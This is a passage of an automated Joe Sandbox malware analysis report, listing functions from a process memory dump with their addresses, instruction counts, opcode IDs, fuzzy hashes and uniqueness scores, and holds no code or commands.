                                        • Instruction Fuzzy Hash: 1AA1F530208B095BDB58EF2DD9D576A7BE5FB98300F44413EE48AC7252DF78E8468B85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A4694 Relevance: .3, Instructions: 332COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 598f397f3b69778daac2eaaef6b3c4bbfdfdb3f79f540112f96d34a6c4a9cc03
                                        • Instruction ID: d5435a5b4e3e267683815162745e02eef87154d79688ffbd3b8af73885aa2ccc
                                        • Opcode Fuzzy Hash: 598f397f3b69778daac2eaaef6b3c4bbfdfdb3f79f540112f96d34a6c4a9cc03
                                        • Instruction Fuzzy Hash: 97A19331718A084FEB5CEF2DEC595AA73E5E7D9701704422EE94AC3262DE38EC41CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A466A Relevance: .3, Instructions: 321COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10e86c06d9910618cc5b66f77cb82d62d4925373147b05d4e8c2e6a669dd5e89
                                        • Instruction ID: bb9bf4adf73c6d8d278e4752a0258dda71bdefe92cd792ffc67977d895d622fc
                                        • Opcode Fuzzy Hash: 10e86c06d9910618cc5b66f77cb82d62d4925373147b05d4e8c2e6a669dd5e89
                                        • Instruction Fuzzy Hash: 0FA1933171CA084FEB58EF2DEC995AA77E6E7E9701704412DE94AC3262DE38DC42C785
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0048887C Relevance: .3, Instructions: 293COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a117638df2a17bf49a3a39157fe60584ec17c00803f73612e120539128a4b84c
                                        • Instruction ID: cf7a6ffb77db2b6499638034ed2f3500850b2dfc7f6350455079d5c5cd1563de
                                        • Opcode Fuzzy Hash: a117638df2a17bf49a3a39157fe60584ec17c00803f73612e120539128a4b84c
                                        • Instruction Fuzzy Hash: E891963151CB488FC729EF19D88556EB3E1FBD4701F500A2FE4CAC3251EA34A856CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004833F4 Relevance: .3, Instructions: 287COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61623ef28c7e9a82e5671d715c4eee77860dcf2673c6d8761fdc9d6e11d536cf
                                        • Instruction ID: 49476836c1dbebe17b3255f50029307b8f10ae1212c9c7e860110801416a2a52
                                        • Opcode Fuzzy Hash: 61623ef28c7e9a82e5671d715c4eee77860dcf2673c6d8761fdc9d6e11d536cf
                                        • Instruction Fuzzy Hash: D391943061CB088FDB55FF2CD88596AB3E5FBA9701B10492EE44AC3255DF38E941CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A8868 Relevance: .3, Instructions: 278COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce088731abad120768bfc8bd0e91de0f3bae826d8c55be845e85c59eb7c43f4f
                                        • Instruction ID: 5bd6d39aa32889a3741ee847fdd509251ec9f3704cbd2e4ad2f10b5c07a3234c
                                        • Opcode Fuzzy Hash: ce088731abad120768bfc8bd0e91de0f3bae826d8c55be845e85c59eb7c43f4f
                                        • Instruction Fuzzy Hash: 6271D331218F098FDB58EF6DD88A62677D5FBA9315B44416FE84AC3252DE38D8018786
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004897E0 Relevance: .3, Instructions: 267COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6924a82ef95a958b2aa66412001cfdfd5b8c31a103d4b682cb69622f63ec2bf3
                                        • Instruction ID: 82b978ae44965ca668d52509a629b6df4e752e4b2a12ec73114b5cdfebf8ac7e
                                        • Opcode Fuzzy Hash: 6924a82ef95a958b2aa66412001cfdfd5b8c31a103d4b682cb69622f63ec2bf3
                                        • Instruction Fuzzy Hash: B6815E70618E198FDB68FF1DD49577933D1FB58314B0844AEDD0ACB35AEA28DC428B89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0048A89C Relevance: .3, Instructions: 251COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f5cebde869e51dc819c135a5814eb4905bc1b1f7f30697e1fdc2f47d0e82474
                                        • Instruction ID: e206989ceb6bb9eb8947f4456a3569d6cd3037e6d8f12e4e8ed28a197653b42f
                                        • Opcode Fuzzy Hash: 9f5cebde869e51dc819c135a5814eb4905bc1b1f7f30697e1fdc2f47d0e82474
                                        • Instruction Fuzzy Hash: 7061D33161CA184FE76CBB28984567A73D1FB94310B16492FE88BC3241EE68EC5287C7
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004983B4 Relevance: .3, Instructions: 251COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b378e01e17c4e5c650ee8d0960df0b5d1cb33bf2332ca04a12c729bc26edfe3
                                        • Instruction ID: 9a2f5f5d267284f796707ff7a9aa89dabbecfb4a78933903b454c48e1594a5ed
                                        • Opcode Fuzzy Hash: 6b378e01e17c4e5c650ee8d0960df0b5d1cb33bf2332ca04a12c729bc26edfe3
                                        • Instruction Fuzzy Hash: 3F71603161CB088FEB54EF5D9C8966AB7E1FB99711F10852EE44AC3210DB78EC41CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A8604 Relevance: .2, Instructions: 236COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8385246579e500e6ce29925d0d8d66cf2b7c617792b475cc54fbe8a13c63a93
                                        • Instruction ID: d3514d1c923356dcf8bbd7488568d445c090fd7164ecbddbc38282be96287072
                                        • Opcode Fuzzy Hash: e8385246579e500e6ce29925d0d8d66cf2b7c617792b475cc54fbe8a13c63a93
                                        • Instruction Fuzzy Hash: 1F619231708E488FEB54FF689C8966A77E2FBA9301F54452EE54BC3260DF38D9418B46
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00490C28 Relevance: .2, Instructions: 220COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e72610f69f26fbbd2acb6c015f23909c3a8ca42fb197216b645ae12246723c3
                                        • Instruction ID: b442051e20386f0aefa731a3345931ed29564700c5ec564af2efe23c673e2378
                                        • Opcode Fuzzy Hash: 1e72610f69f26fbbd2acb6c015f23909c3a8ca42fb197216b645ae12246723c3
                                        • Instruction Fuzzy Hash: C0519131718A084FAB58EF6D9C9A67A77D3E7E8711304813AE40AC3365DE38E9028785
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0048B6DC Relevance: .2, Instructions: 202COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fad25e9750f3a1575d3b3e6a18fa9897dd8c7f1a5f6617353f2ec9310b8fff7b
                                        • Instruction ID: 7ad316da3e32ec208265f13dbecd8ad0715c27e933f2b1534792dd8fb1b96cce
                                        • Opcode Fuzzy Hash: fad25e9750f3a1575d3b3e6a18fa9897dd8c7f1a5f6617353f2ec9310b8fff7b
                                        • Instruction Fuzzy Hash: D8516630718A054FEB78FB79D8597AA73D5FB94301F10492AD88AC3251EF38D9468786
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004926E8 Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93546eb3bfc705db56e75c2a0e46e266bd3bc845b41a205c9ab158bf72fb1b49
                                        • Instruction ID: f4ff77cfc1af01780087e932cef31a71ba5c9c9f3f6ed4fd58e318753b1cec1b
                                        • Opcode Fuzzy Hash: 93546eb3bfc705db56e75c2a0e46e266bd3bc845b41a205c9ab158bf72fb1b49
                                        • Instruction Fuzzy Hash: 2A315030714B058BEB54EF39D88966BBBE2FBD8301B14893EE445C3264DF78D9458B81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00493FF8 Relevance: .1, Instructions: 107COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24f21d4ca474a2c253d7c73ad1d90bd10758c4465e2763e33617c7b034bf1198
                                        • Instruction ID: a2506a85bc166ef65d86f12ff1bfee1bb5e2b84e45bd2119118b7152adbbfb3a
                                        • Opcode Fuzzy Hash: 24f21d4ca474a2c253d7c73ad1d90bd10758c4465e2763e33617c7b034bf1198
                                        • Instruction Fuzzy Hash: F7413B1511DBC2AEC31ADA2D84801A9FFA1BFB6100B48879DD4C997F43C358E669C7E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004863F0 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b454d842f9f88384d18c86c8e755cf4ef0706ea229745edaae1119937da050f8
                                        • Instruction ID: 9be3094a689b3374de1c4e4e75cd1452449ab8df5905a8c822b014aaea9169df
                                        • Opcode Fuzzy Hash: b454d842f9f88384d18c86c8e755cf4ef0706ea229745edaae1119937da050f8
                                        • Instruction Fuzzy Hash: A5318F1111DBC7AEC30ADA6D80401A9FFA1FB77200B48879DD4D597B43C318E6A9C7E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%